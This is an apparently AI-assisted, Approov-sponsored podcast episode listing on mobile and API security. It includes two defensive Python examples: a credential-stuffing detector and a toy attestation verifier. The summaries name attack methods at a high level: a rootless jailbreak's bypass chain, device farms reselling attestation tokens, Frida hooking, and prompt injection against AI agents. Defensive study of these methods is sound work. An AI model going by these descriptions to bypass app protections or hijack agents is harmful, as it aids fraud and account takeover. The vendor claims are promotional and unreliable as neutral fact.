Upwardly Mobile - API & App Security News

PODCAST · technology

Upwardly Mobile - API & App Security News

Think the App Store’s built-in security is enough? Think again. Welcome to Upwardly Mobile, the podcast that exposes the gaps in iOS, Android, and HarmonyOS security. Hosts Skye and George take you into the high-stakes world of mobile defense, revealing why standard protections from Apple, Google, and Samsung often leave your sensitive data exposed. Sponsored by Approov, a mobile app attestation service, we move beyond the basics to tackle weaponized AI threats and dynamic API attacks. From runtime attestation to navigating complex compliance regulations, we equip developers and security pros with the actionable strategies needed to thwart attackers. Don’t leave your app vulnerable. Subscribe now on Spotify and Apple Podcasts to elevate your security game.

  1. 122

    Leveling the Playing Field - Human vs. Betting Bots

    Episode Summary: In this episode of Upwardly Mobile, we dive into the high-stakes world of sports betting and prediction markets like Polymarket, where millions of dollars move in seconds. Human bettors are increasingly outmatched, not by sharper sports fans but by high-frequency trading (HFT) bots and AI agents. We explore how "cheating" in mobile betting has evolved from simple "bonus bagging" and multi-accounting to API impersonation, where AI scrapes odds across 50 books simultaneously. Discover why AI-driven solvers have rendered CAPTCHAs useless, and learn about the "Human Tax": the invisible cost human bettors pay when bots clean out the best lines and force them to accept worse odds. Finally, we discuss how a "Positive Security Model" ensures that only genuine, official mobile apps can place a bet, protecting the integrity of the game.

    Key Data Points Discussed:
    • The Arbitrage Gap: Arbitrage windows on prediction markets have collapsed from 12+ seconds to sub-100 ms latencies.
    • The $40M Loss: A study of Polymarket found that "botted" bettors secured over $40 million in risk-free profits by exploiting price lags humans couldn't see.
    • Bot Dominance: In high-volume markets, automated trading accounts for over 70% of the volume, leaving humans at a severe disadvantage.
    • Compliance Failures: Over 4,800 underage registration attempts were flagged by major sportsbooks in 2025, many of them likely automated scripts attempting to scale multi-accounting operations.

    Sponsor: This episode is brought to you by Approov. Ensure your platform operates on a Positive Security Model by cryptographically attesting that only your genuine mobile app is accessing your APIs. Learn how Approov addresses the security trust gap at approov.com.

    Source Materials & Further Reading (note: as specific URLs were not provided in the source notes, please search these titles to read the full reports):
    • GamblingNews: Botted Bettors Earn $40M Exploiting Polymarket
    • CleanSky: Why Copying Polymarket Whales Will Lose You Money
    • Approov Whitepaper: How Approov Addresses the Security Trust Gap
    • QuantVPS: Sports Betting Bots on Polymarket

    Keywords: Sports betting bots, Polymarket exploits, API impersonation, high-frequency trading (HFT) betting, prediction market bots, Positive Security Model, mobile API security, multi-accounting scripts, the Human Tax, arbitrage gaps, cryptographic attestation, mobile app security.

    🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | Podcast
    This episode includes AI-generated content.

  2. 121

    Android 17 | Securing the Future: AI Agents, API Risks & Advanced Protection

    Welcome to another episode of Upwardly Mobile, your guide to defending mobile apps in today’s volatile digital landscape. In this episode, hosts Skye and George unpack the security implications of Android 17. As smartphones evolve from passive tools into autonomous "agentic" devices powered by on-device AI and AppFunctions, the attack surface for mobile APIs expands dramatically. We explore the security trade-offs of these new features, including the rising threats of prompt injection, cross-app data leakage, and the large "blast radius" if an AI agent is tricked into executing unintended actions using legitimate permissions. We also break down Google's latest platform hardening measures, specifically how Android Advanced Protection Mode (AAPM) will block apps that are not declared accessibility tools from using the AccessibilityService API, closing a path malware uses for screen monitoring and credential theft. Whether you are an iOS, Android, or HarmonyOS developer, learn how to adapt to these secure-by-default changes and build a "trust chain" by securing your exposed AI surface area with robust API attestation.

    Sponsor: This episode is proudly sponsored by Approov Mobile Security, a zero-trust mobile app attestation and API security service. Approov extends platform security by verifying real apps, preventing bot abuse, and eliminating hard-coded secrets to stop API abuse at the source. Visit approov.com to secure your APIs against ever-advancing cyber threats.

    Key Topics Discussed:
    • The Rise of Agentic Phones: How Android 17 shifts intelligence directly to the device with Gemini-powered "Magic Actions" and cross-app workflows.
    • AI Agent Risks: The dangers of direct and indirect prompt injection, malicious plugins, and lateral movement across systems.
    • Locking Down the Accessibility API: How Android 17's Advanced Protection Mode enforces least-privilege access by exempting only services that declare themselves accessibility tools (android:isAccessibilityTool="true" in the service's metadata), preventing screen monitoring and automated malware.
    • Platform Hardening for Developers: Essential updates you need to know, including tighter background activity launch (BAL) rules, safer dynamic code loading (DCL) for native libraries, and mandatory local network permission declarations.
    • Defensive Strategies: Why developers must scope AI actions narrowly, separate "read" from "act" permissions, and require explicit user consent for high-risk workflows.

    Resources & Source Materials:
    • Android 17: Your Phone's AI is Evolving to be More Autonomous – By Joyce Kuo, Approov Mobile Security
    • Android 17 Blocks Non-Accessibility Apps from Accessibility API to Prevent Malware Abuse – The Hacker News / Cyberyami
    • Behavior changes: Apps targeting Android 17 or higher – Android Developers Official Documentation

    SEO Keywords: Android 17 security, mobile app development, API security, AI agents, Gemini AI risks, prompt injection, Advanced Protection Mode, Accessibility API malware, mobile cybersecurity, AppFunctions, app attestation, zero-trust mobile.
    This episode includes AI-generated content.

  3. 120

    The Age of Agentic AI: Securing Mobile APIs Against Bots with Brains

    Episode Summary: Welcome back to Upwardly Mobile! In this episode, we dive into the rapidly evolving mobile threat landscape defined by the rise of "Agentic AI." With Android 17 set to turn our smartphones into active, on-device AI orchestrators by summer 2026, the security stakes have never been higher. We unpack the findings of the 2026 Cloudflare Threat Report, which describes the industrialization of cyber threats and how attackers use AI as a force multiplier. We also explore why legacy bot defenses (rate limiting, CAPTCHAs, and behavioral biometrics) are failing against modern AI bots that can dynamically rewrite code and mimic human behavior with 99% accuracy. Finally, we discuss how integrating Cloudflare's edge network with Approov's deterministic device attestation provides a defense-in-depth architecture that stops mobile API abuse at the source. If you are attending the RSA Conference (RSAC) in San Francisco in March 2026, catch up with our sponsors at Approov to learn how to future-proof your mobile architecture.

    Key Takeaways:
    • The Android 17 Revolution: Android 17 shifts the OS from a reactive tool to an active "agent phone" that orchestrates multi-step workflows across apps. This brings benefits in speed and privacy, but it also expands the attack surface for prompt injection and cross-app data leakage.
    • The Industrialization of Cyber Threats: The 2026 Cloudflare Threat Report reveals that AI has lowered the barrier to entry for effective cyber operations, moving the industry toward automated, machine-speed exploits.
    • The Death of Legacy Bot Defenses: Probabilistic defenses such as WAFs and CAPTCHAs are failing because multimodal LLM agents can now solve logic puzzles and mimic human "thumb jitter."
    • Cryptographic Proof of Life: To stop agentic AI, security must shift from asking "Is this a bot?" to demanding deterministic, cryptographic proof of the device's and app's integrity.
    • A New Defense-in-Depth: Combining Cloudflare's global edge network with Approov's runtime analysis and "Zero Secrets" architecture ensures that only untampered, legitimate app instances can access your APIs.

    Sponsor Links: Secure your mobile APIs today. Visit approov.com to learn how to eliminate hardcoded secrets and implement deterministic device attestation.

    Source Materials & Further Reading:
    • Android 17: Android Is Becoming an Agent - Are you ready?
    • 2026 Cloudflare Threat Report: How adversaries are weaponizing the Internet
    • When the Bot Has a Brain: Defending Mobile APIs in the Era of Agentic Attackers (Approov RSAC 2026 Presentation)
    • See You at RSA 2026: Let's Talk Stopping Mobile API Abuse at the Source

    Keywords for SEO: Agentic AI, Mobile API Security, Android 17, Cloudflare Threat Report 2026, Approov, Bot Mitigation, RSA Conference 2026, Cybersecurity, Device Attestation, Zero Secrets Architecture, AI Bots, Malware Defense, Prompt Injection, API Abuse.
    This episode includes AI-generated content.

  4. 119

    Epic Victory: Google Play's Walled Garden Opens Up & What It Means for Developers

    Episode Summary: In this episode of Upwardly Mobile, we dive into the landmark antitrust settlement between Epic Games and Google that is set to reshape the Android app ecosystem globally. After years of legal battles sparked by Epic's "Project Liberty" and the removal of Fortnite from the Play Store, a jury found Google liable for maintaining an illegal monopoly. We break down the newly announced March 2026 settlement, which significantly lowers Play Store commission fees and introduces a "Registered App Stores" program. What does this mean for mobile developers, app revenue, and Android security? Tune in to find out!

    Brought to you by Approov: As Android opens its doors to third-party "Registered App Stores" and frictionless sideloading, protecting your mobile app and APIs from malicious clones and tampering is more critical than ever. Secure your mobile business and authenticate your apps natively with Approov.

    Key Topics Discussed:
    • The Origins of the Lawsuit: How Epic Games' Tim Sweeney bypassed Google's standard 30% fee by allowing direct purchases in Fortnite, leading to the game's removal and a massive antitrust lawsuit.
    • The Courtroom Battle: The internal practices uncovered during the trial, including Google's "Project Hug" and the millions of dollars spent to keep developers from abandoning the Play Store.
    • The 2026 Settlement Details: How Google is dropping its standard Play Store commission to 20% for in-app purchases and 10% for recurring subscriptions.
    • Registered App Stores Program: A deep dive into Google's new framework that allows alternative Android app stores (like the Epic Games Store) to become "first-class citizens" on Android devices, removing the "doom-laden" security pop-ups previously associated with sideloading.
    • Global Rollout Timeline: When these fee changes and developer programs go live, starting in the US, UK, and European Economic Area in June 2026 and expanding globally by September 2027.

    Source Materials & Further Reading:
    • TechCrunch: Google settles with Epic Games, drops its Play Store commissions to 20%
    • Wikipedia: Epic Games v. Google

    Targeted SEO Keywords: Epic Games vs Google, Google Play Store settlement, Android app ecosystem, Registered App Stores program, mobile app development, third-party app stores, sideloading Android apps, app store commission fees, Tim Sweeney, Fortnite Android return, mobile app security, API protection.
    This episode includes AI-generated content.

  5. 118

    Unpacking the Spotify Exploits: Credential Stuffing, Fake Streams, and Mobile App Security

    Episode Summary: In this episode of Upwardly Mobile, we dive into the digital exploitation landscape of one of the world's largest audio streaming platforms. We break down the credential stuffing attack that compromised 350,000 Spotify users, exposing the dangers of poor password hygiene and unsecured databases. We also explore the ongoing controversies surrounding Spotify, including lawsuits over artificial streaming, bot farms, and the platform's "Discovery Mode". Additionally, we highlight a growing trend in which malicious actors weaponize Spotify's search features to promote pirated software, phishing schemes, and malware. Finally, we pivot to actionable solutions for developers, exploring how Zero Trust Runtime Protection and App Attestation can prevent automated mobile attacks.

    Brought to you by Approov: Don't let bots, scripts, or fake apps compromise your platform. Learn how to stop credential stuffing and secure your APIs at approov.com.

    Sponsor Spotlight: Approov Mobile Security. Are your mobile apps and APIs safe from automated credential stuffing, emulators, and Man-in-the-Middle (MitM) attacks? Approov ensures that only genuine mobile app instances running in safe environments can access your APIs, blocking scripts, modified apps, and bots in real time. 👉 Secure your mobile platforms today at approov.com.

    Source Materials & Further Reading:
    • 350,000 Spotify users hacked in credential stuffing attack | IT Pro
    • Spotify Finds Itself At The Centre Of Payola And Fake Stream Storm | Noise11.com
    • Spotify misused for scams and malware | Digital Watch Observatory
    • Strategies to Stop Credential Stuffing Attacks on Mobile Apps | Approov

    Keywords: Credential stuffing, mobile app security, Spotify hack, artificial streaming, bot farms, zero trust runtime protection, API security, mobile malware, phishing schemes, app attestation, Approov.
    This episode includes AI-generated content.
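The credential stuffing attack discussed in this episode is the kind of thing a backend can spot from its own login logs before any account data leaks. The detector below is an added example written for this page, not code from Approov or Spotify: it runs over a constructed login log (the `ts ip=… user=… result=…` format is an assumption) and flags a source IP that fails logins against many distinct usernames inside a short window, which is the signature of a tool walking a leaked credential list rather than one person retrying a forgotten password. It also lists the accounts that did log in successfully from a flagged IP, since those are the stuffing "hits" that need a forced reset.

```python
"""Velocity-based credential-stuffing detector over login audit lines.

Constructed example for this page; the log format is an assumption, not any
real system's. Signal: one source IP failing logins against many distinct
usernames inside a short window. A forgetful user retries one account; a
stuffing tool walks a leaked list.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, Iterable, Optional, Tuple

LOG_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)\s*$"
)

WINDOW = timedelta(seconds=60)
DISTINCT_USER_THRESHOLD = 5  # distinct usernames failing from one IP inside WINDOW

# Constructed sample: one stuffing source (203.0.113.7), one legitimate user
# retrying a single account (198.51.100.20), one slow source (192.0.2.9).
SAMPLE_LOG = """\
2025-03-01T10:00:00 ip=203.0.113.7 user=alice result=fail
2025-03-01T10:00:01 ip=203.0.113.7 user=bob result=fail
2025-03-01T10:00:02 ip=203.0.113.7 user=carol result=fail
2025-03-01T10:00:03 ip=198.51.100.20 user=frank result=fail
2025-03-01T10:00:03 ip=203.0.113.7 user=dave result=fail
2025-03-01T10:00:04 ip=203.0.113.7 user=erin result=ok
2025-03-01T10:00:05 ip=203.0.113.7 user=grace result=fail
this line is not in the expected format
2025-03-01T10:00:10 ip=198.51.100.20 user=frank result=fail
2025-03-01T10:00:20 ip=198.51.100.20 user=frank result=fail
2025-03-01T10:00:30 ip=198.51.100.20 user=frank result=fail
2025-03-01T10:00:40 ip=198.51.100.20 user=frank result=fail
2025-03-01T10:00:50 ip=198.51.100.20 user=frank result=ok
2025-03-01T10:01:00 ip=192.0.2.9 user=u1 result=fail
2025-03-01T10:03:00 ip=192.0.2.9 user=u2 result=fail
2025-03-01T10:05:00 ip=192.0.2.9 user=u3 result=fail
2025-03-01T10:07:00 ip=192.0.2.9 user=u4 result=fail
2025-03-01T10:09:00 ip=192.0.2.9 user=u5 result=fail
"""


def parse(line: str) -> Optional[Tuple[datetime, str, str, str]]:
    m = LOG_RE.match(line)
    if not m:
        return None  # unparseable lines are skipped, never counted as failures
    return datetime.fromisoformat(m["ts"]), m["ip"], m["user"], m["result"]


def detect(lines: Iterable[str]) -> Dict[str, datetime]:
    """Single streaming pass; returns {ip: time the IP was first flagged}."""
    recent = defaultdict(deque)  # ip -> deque of (ts, user) failures inside WINDOW
    flagged: Dict[str, datetime] = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, ip, user, result = rec
        if result != "fail":
            continue
        window = recent[ip]
        window.append((ts, user))
        while window and ts - window[0][0] > WINDOW:
            window.popleft()  # expire failures older than WINDOW
        if ip not in flagged and len({u for _, u in window}) >= DISTINCT_USER_THRESHOLD:
            flagged[ip] = ts
    return flagged


def accounts_to_reset(lines: Iterable[str]) -> set:
    """Usernames with a successful login from a flagged IP: the stuffing hits."""
    lines = list(lines)
    bad_ips = detect(lines)
    hits = set()
    for line in lines:
        rec = parse(line)
        if rec and rec[3] == "ok" and rec[1] in bad_ips:
            hits.add(rec[2])
    return hits


def run_sample() -> Tuple[Dict[str, str], set]:
    lines = SAMPLE_LOG.splitlines()
    flagged = {ip: ts.isoformat() for ip, ts in detect(lines).items()}
    return flagged, accounts_to_reset(lines)


if __name__ == "__main__":
    print(run_sample())  # ({'203.0.113.7': '2025-03-01T10:00:05'}, {'erin'})
```

Two things the sample is built to show: a user failing six times against one account never trips the distinct-username threshold, and a source that spreads five usernames over eight minutes stays under it because old failures fall out of the window. The caveat is the one the episode makes: a stuffing operation routed through a proxy pool or a device farm spreads its failures across many IPs, and per-IP velocity alone will miss it, which is why server-side detection needs a request-origin signal such as app attestation alongside it.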

  6. 117

    Securing Mobile Healthcare | The Hidden Dangers in Mental Health Apps

    Episode Summary: In this episode of Upwardly Mobile, we dive into a new cybersecurity report revealing that millions of users' highly sensitive medical data may be at risk. We discuss the discovery of 1,500 vulnerabilities across 10 popular mental health apps, which together have been downloaded over 14 million times. From leaked therapy transcripts and mood logs to the high black-market value of stolen health records, we unpack the risks threatening the digital healthcare space today. Finally, we explore actionable solutions for healthcare providers and developers to lock down their platforms, featuring Runtime Application Self-Protection (RASP), dynamic certificate pinning, and end-to-end API security.

    Key Topics Discussed in This Episode:
    • The Mental Health App Crisis: How researchers at Oversecured uncovered 54 high-severity flaws in leading mental health applications, leaving sensitive data such as Cognitive Behavioral Therapy (CBT) session notes and medication schedules exposed.
    • The Black Market for Health Data: Why cybercriminals target therapy records, which can sell for upwards of $1,000 each, far more than stolen credit card numbers.
    • Common Developer Pitfalls: The dangers of outdated apps, plaintext configuration data, hardcoded Firebase URLs, and insecure encryption keys.
    • Securing Mobile Health: How Runtime Application Self-Protection (RASP) and dynamic certificate pinning can prevent Man-in-the-Middle (MitM) attacks, block bots, and support HIPAA and GDPR compliance.

    Sponsor: This episode is brought to you by Approov. Approov provides end-to-end protection for mobile health apps and APIs. Its lightweight SDK and RASP technology can be deployed in a single sprint to block bot attacks, prevent credential stuffing, and stop API abuse. Keep your patients' health data safe, even on jailbroken devices or insecure Wi-Fi networks. Learn how to protect your revenue and patient trust at approov.com.

    Resources & Source Materials:
    • TechRadar Report: Multiple mental health apps riddled with high severity security flaws — data of millions put at risk, so be on your guard
    • Approov Mobile Health Security: Ensure Security and Trust for Healthcare Apps

    SEO Keywords: Mobile app security, mental health apps, healthcare data breach, API security, mobile health compliance, HIPAA compliance mobile apps, RASP technology, cybersecurity podcast, Oversecured vulnerabilities, patient data protection, Approov mobile security.
    This episode includes AI-generated content.

  7. 116

    The Triangle of Trust: Mastering Mobile App Attestation & Zero Trust API Security

    Welcome to another episode of Upwardly Mobile! In this episode, we take a deep dive into the evolution of runtime security for mobile API access. Static API keys are easily stolen because they sit directly inside the user's copy of the app. To address this, we explore the "Triangle of Trust" architecture developed by CriticalBlue, the company behind the Approov mobile security service. We unpack the technical details of US Patent 11,163,858 B2, titled "Client Software Attestation," which establishes a Zero Trust proof of software integrity for apps operating on the public internet. The episode breaks down how the patented system computes a cryptographic hash fingerprint of the executing code image to detect tampering at run time, so that a modified client cannot pass itself off as the genuine app. We also discuss how Approov's platform-agnostic approach differs from OS-native solutions like Google Play Integrity and Apple App Attest, especially in global markets that include Huawei's HarmonyOS NEXT and non-GMS Android devices.

    Key Takeaways from this Episode:
    • The Triangle of Trust: A tripartite architecture that separates the security check from the access itself, involving an Issuer (the Approov cloud attestation server), a Holder (the mobile client device), and a Verifier (the backend server).
    • Dynamic Code Fingerprinting: How client applications compute a cryptographic hash of their own executing code image to prove integrity, so that no sensitive "master keys" are ever stored on the device where they could be extracted.
    • Protection Against Advanced Threats: The system's ability to thwart runtime instrumentation attacks (such as memory hooking with Frida) and Man-in-the-Middle (MITM) attacks by verifying code dynamically in memory rather than only checking static OS state.
    • Comparison with OS-Native Tools: Why a unified, cross-platform attestation approach matters for the global market, avoiding the latency, platform restrictions, and hardware dependencies of Google Play Integrity and Apple App Attest.
    • A Defensible Security Moat: An analysis of why CriticalBlue's patent is highly defensible and has been cited over 60 times as prior art, acting as a technical blocker for competitors in the cybersecurity industry.

    Sponsor: This episode is brought to you by Approov. Stop relying on static API keys and secure your mobile business with deterministic, zero-trust software integrity. With reach across iOS, GMS Android, non-GMS Android, and HarmonyOS, Approov ensures your backend APIs are shielded from malicious bots and tampered apps. Visit approov.com to learn more and secure your mobile ecosystem today.

    Source Materials & Relevant Links:
    • US Patent 11,163,858 B2: Client Software Attestation, by Richard Michael Taylor / Critical Blue Ltd. (filed 2015, granted Nov 2, 2021)
    • Whitepaper Excerpt: Attestation: The Triangle of Trust
    • Approov Official Website: approov.com

    SEO Keywords: Mobile API security, Zero Trust architecture, App attestation, Approov, CriticalBlue, Cryptographic hash fingerprint, Google Play Integrity alternative, Apple App Attest alternative, Man-in-the-Middle protection, US Patent 11163858, Mobile app tampering, Cybersecurity podcast.
    This episode includes AI-generated content.

  8. 115

    The "Rootless" Revolution: Inside the Dopamine Jailbreak & The EBT Security Crisis

    🎧 Episode Summary: In this episode of Upwardly Mobile, we dive into two stories reshaping the mobile security landscape. First, we unpack the architecture of Dopamine, the modern "rootless" jailbreak for iOS 15 and iOS 16 that never touches the system partition. We explore how it sidesteps Apple’s Signed System Volume (SSV) by leaving the sealed system volume untouched and building its environment under /var/jb, and what this means for app developers trying to detect compromised devices. Then, we shift to a systemic failure in government fintech: why the "Lock Card" feature in EBT mobile apps is failing to stop fraud. We break down how attackers bypass mobile controls using legacy magstripe rails and bot attacks.

    🚀 Key Topics Discussed:
    • The Dopamine Architecture: Understanding the shift from "rootful" to "rootless" jailbreaking.
    • How it Works: The exploit chain, including PAC and PPL bypasses, and the creation of the fake root environment in /var/jb.
    • Detection Challenges: Why traditional jailbreak detection methods struggle against rootless environments, and the reliance on finding tweak injection libraries such as ElleKit.
    • The EBT Mobile Failure: Why locking your EBT card in the mobile app doesn't actually stop thieves at the register.
    • API Abuse: How botnets hammer IVR and app APIs to time their theft precisely.

    🔗 Resources & Links:
    Dopamine Jailbreak:
    • Official Project: Dopamine GitHub (opa334)
    • Installation Guide: iOS CFW Guide
    • Technical Insight: ElleKit - Tweak Injection
    EBT & Mobile Fraud Analysis:
    • The Mechanics of Theft: Propel: How EBT Benefits are Stolen
    • Systemic Vulnerabilities: Pennsylvania Office of State Inspector General

    🛡️ Sponsor: This episode is brought to you by Approov. Is your mobile app running on a jailbroken device? Are bots scraping your API endpoints? Approov provides a comprehensive mobile security solution that ensures only genuine mobile app instances, running in safe mobile environments, can access your backend APIs. 👉 Learn more at: approov.com

    🔍 SEO Keywords: Dopamine Jailbreak, Rootless Jailbreak, iOS 15 Jailbreak, iOS 16 Security, Mobile App Security, EBT Fraud, Skimming, API Security, Sideloading, TrollStore, Magstripe Vulnerabilities, App Attestation.
    This episode includes AI-generated content.

  9. 114

    Beyond the Hardware: Why Key Attestation Is Just a Receipt, Not a Security Strategy

    In this episode of Upwardly Mobile, we dive into the often-misunderstood world of mobile app security to debunk the myth that hardware-backed key attestation is a "silver bullet." Drawing on analysis from Approov, Oasis, and community discussions, we explore why relying solely on Apple’s App Attest or Google’s Play Integrity can leave your APIs vulnerable to attacks such as device farming and runtime instrumentation. We explain why an attestation is only a "snapshot" in time and how to implement a true defense-in-depth strategy.

    Key Takeaways:
    • The Hardware Myth: Google and Apple promote hardware-backed key attestation (using TEEs or Secure Elements) as a primary security measure, but the approach has critical limitations when used in isolation. It proves that a cryptographic key is held in secure hardware; it does not guarantee the integrity of the app calling that key or the intent of the user operating it.
    • The "Receipt" Analogy: Remote attestation is effectively a receipt proving that a specific binary ran on specific hardware at a specific moment. It does not prove that the state has not been rolled back, that the operator is not malicious, or that the inputs have not been manipulated since that snapshot was taken.
    • The Threat of Device Farms: Attackers can amass legitimate iPhones in "device farms" to generate valid App Attest tokens. Those tokens are then sold via APIs to bots, allowing scripts to impersonate genuine devices and bypass hardware-only checks.
    • Runtime Manipulation: Instrumentation tools such as Frida (and, on rooted Android, Magisk modules) let attackers hook API calls and forge attestation results or alter the application's behavior after boot. Without Runtime Application Self-Protection (RASP), a validly attested device can still run a compromised app.
    • The Solution is Multi-Layered: Effective security requires moving verification off the device to the cloud and implementing dynamic checks. A robust strategy combines RASP, dynamic certificate pinning, and cloud-based mobile attestation that verifies the app's integrity continuously, not just at boot.

    Featured Resources & Source Material:
    • Article: Limitations of Hardware-Backed Key Attestation in Mobile Security – An analysis of why verification must always occur off-device.
    • Article: How to Defeat Apple DeviceCheck and AppAttest – A technical look at how attackers bypass iOS security using instrumentation and device farms.
    • Community Insight: TEE Attestation Isn’t Trust, It’s Just a Receipt – A breakdown of why attestation does not equal trust.
    • Deep Dive: Attestation Is not Enough – Exploring the nuances of remote attestation within trust systems.
    • Definition: Trusted Execution Environment (Wikipedia) – Understanding the history and hardware behind TEEs.

    Sponsored By: This episode is brought to you by Approov. Approov Mobile Security provides a comprehensive solution that goes beyond simple attestation. By combining RASP, dynamic certificate pinning, and cloud-based verification, Approov ensures that only genuine, untampered instances of your app can access your APIs.
    • Website: approov.com
    • Talk to an Expert: Schedule a Call
    • Check Your Security: Approov Mobile App Assessment

    Keywords: Mobile Security, API Security, App Attestation, RASP, Device Farms, Man-in-the-Middle Attacks, Jailbreak Detection, Apple App Attest, Google Play Integrity, Approov, Cybersecurity, Trusted Execution Environment (TEE).
    This episode includes AI-generated content.
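The issuer/holder/verifier split described in the Triangle of Trust episode (116) and the "receipt" argument in this episode (114) can be made concrete with a small model. The code below is an added example written for this page, not Approov's protocol or code, and it assumes a shared HMAC key held only by the issuer and verifier (never by the app), a short token lifetime, and a nonce the backend hands out per request. The issuer vouches for a measurement only if it matches a known-good build hash, and the verifier checks signature, expiry, nonce binding and single use. The verifier's comments spell out what a passing token does and does not prove.

```python
"""Toy model of the issuer / holder / verifier ("triangle of trust") split.

Constructed example for this page, not Approov's protocol or code.
Assumptions: issuer and verifier share an HMAC key the app never holds;
tokens are short-lived and bound to a nonce the backend hands out.
"""
import base64
import hashlib
import hmac
import json
import time
from typing import Optional, Tuple

# Shared only between issuer and verifier; never shipped inside the app (constructed).
ISSUER_SECRET = b"issuer-verifier-shared-key-constructed"
TOKEN_TTL_SECONDS = 300

# Measurements of released builds the issuer will vouch for (constructed bytes).
GOOD_APP_IMAGE = b"\x7fELF official-build-0x1234"
KNOWN_GOOD_HASHES = {hashlib.sha256(GOOD_APP_IMAGE).hexdigest()}


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def measure(image: bytes) -> str:
    """Holder side: SHA-256 of the executing code image."""
    return hashlib.sha256(image).hexdigest()


def issue_token(measurement: str, nonce: str, now: Optional[float] = None) -> Optional[str]:
    """Issuer side: vouch for a known-good measurement with a signed, nonce-bound token."""
    if measurement not in KNOWN_GOOD_HASHES:
        return None  # unknown or tampered image: no token, so no API access
    now = time.time() if now is None else now
    claims = {"iat": int(now), "exp": int(now) + TOKEN_TTL_SECONDS, "nonce": nonce}
    body = _b64(json.dumps(claims, sort_keys=True).encode())
    sig = hmac.new(ISSUER_SECRET, body.encode(), hashlib.sha256).digest()
    return f"{body}.{_b64(sig)}"


class Verifier:
    """Backend side: checks signature, expiry, nonce binding and single use.

    What a passing token proves: the issuer saw a known-good image at `iat`.
    That is the "receipt". Freshness comes only from the TTL and the nonce;
    nothing here proves the app was not hooked after the measurement.
    """

    def __init__(self) -> None:
        self.seen_nonces = set()

    def verify(self, token: str, expected_nonce: str, now: Optional[float] = None) -> Tuple[bool, str]:
        now = time.time() if now is None else now
        parts = token.split(".")
        if len(parts) != 2:
            return False, "malformed"
        body, sig = parts
        expected = hmac.new(ISSUER_SECRET, body.encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _unb64(sig)):
            return False, "bad signature"
        claims = json.loads(_unb64(body))
        if now >= claims["exp"]:
            return False, "expired"
        if claims["nonce"] != expected_nonce:
            return False, "nonce mismatch"  # token minted for some other request
        if claims["nonce"] in self.seen_nonces:
            return False, "replayed"  # a captured token (e.g. sold by a device farm) cannot be reused
        self.seen_nonces.add(claims["nonce"])
        return True, "ok"


if __name__ == "__main__":
    v = Verifier()
    t = issue_token(measure(GOOD_APP_IMAGE), "nonce-1", now=1000)
    print(v.verify(t, "nonce-1", now=1100))  # (True, 'ok')
    print(v.verify(t, "nonce-1", now=1100))  # (False, 'replayed')
    print(issue_token(measure(b"patched build"), "nonce-2", now=1000))  # None
```

The point of the nonce and the replay set is the device-farm case from this episode: a genuine token harvested on real hardware is worthless once it has been spent or once the backend's nonce no longer matches. The point of the docstring on the verifier is the other half of the argument: even with all four checks passing, the backend has a receipt for a moment in time, which is why the episode pairs attestation with runtime protection rather than treating it as the whole strategy.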

  10. 113

    SNAP | Why Mobile Apps Are Failing to Stop Food Stamp Fraud?

    Episode Summary: In this episode of Upwardly Mobile, we investigate a growing financial crisis affecting the nation’s most vulnerable families. The USDA now estimates that up to $12 billion is stolen annually from the Supplemental Nutrition Assistance Program (SNAP). We explore how transnational criminal rings use technology ranging from physical skimmers to brute-force cyberattacks to drain EBT cards in seconds. We also break down why the government’s latest answer, mobile apps that let users "lock" their cards, is failing to stop the theft. We analyze the technical weaknesses of the legacy magstripe system and explain why app-based controls are often bypassed by backend fraud and race conditions.

    This episode is sponsored by Approov. Mobile apps are now the front door to critical services, but as we discuss in this episode, they are only as strong as the security frameworks behind them. Approov provides comprehensive mobile app protection, ensuring that the requests hitting your API come from genuine apps running on untampered devices.

    Key Topics & Takeaways:
    • The Scale of the Problem: Federal investigators estimate that SNAP fraud has hit all-time highs, potentially reaching $12 billion annually. Georgia alone reported nearly $23 million stolen in the first quarter of 2025.
    • How the Fraud Works: Criminals use advanced skimming technology and "brute force" software that can guess a four-digit PIN in less than a second. The Secret Service notes that these are often transnational organized crime groups able to operate easily across borders.
    • The "Lock" Feature Failure: Many states, including Georgia, encouraged users to download apps like ConnectEBT to "lock" their cards. However, users like Sheria Robertson report having funds stolen minutes after unlocking the card in the app to make a purchase.
    • The Technical Vulnerability: EBT cards still rely on legacy magnetic stripe technology rather than EMV chips. Because the backend authorizes on static track data and a PIN, the mobile app’s "lock" is often bypassed through race conditions or bot attacks on IVR systems.
    • Bot Attacks: Cybercriminals use bots to hammer IVR systems, checking balances so they can time withdrawals to the moment funds are deposited.

    Featured Stories & Data:
    • Victim Spotlight: Sheria Robertson, a single mother who lost her Thanksgiving food budget to thieves in Brooklyn, NY, despite being in Georgia and using the app's security features.
    • Investigator Insight: Mark Haskins of the USDA Food and Nutrition Service explains that criminals are "taking it to the next level" with cyber and brute-force attacks.
    • State Data: Top states for reported fraud include Georgia, New York, and California.

    Relevant Links & Resources:
    • USDA SNAP Replacement of Stolen Benefits Dashboard
    • Report Fraud: USDA Office of Inspector General Hotline [(800) 424-9121]
    • Technical Deep Dive: Security Vulnerabilities and Fraud Mechanics in EBT Systems
    • News Coverage: WSB-TV: Georgia officials say state SNAP system subject to cyberattack
    • Propel App Resource: How are EBT benefits being stolen?

    Keywords: SNAP fraud, EBT skimming, food stamp theft, mobile app security, Approov, ConnectEBT, cybercrime, magnetic stripe vulnerability, USDA, social safety net, financial fraud, IVR bot attacks.
    This episode includes AI-generated content.

  11. 112

    The Punkt MC03: Can You De-Google Without the Headache?

    In this episode, we explore the landscape of "privacy-first" smartphones, focusing on the newly unveiled Punkt MC03. We break down whether this Swiss-designed, German-made device can finally offer a viable alternative to the data-harvesting giants of the mobile world. We discuss the trade-offs of leaving the Google ecosystem, the unique "subscription-based" operating system model, and whether the return of the removable battery signals a shift in hardware trends.

    Key Topics & Timestamps:
    • The "De-Googled" Promise: The Punkt MC03 runs AphyOS, a custom version of Android that strips out Google Mobile Services to minimize background tracking and profiling.
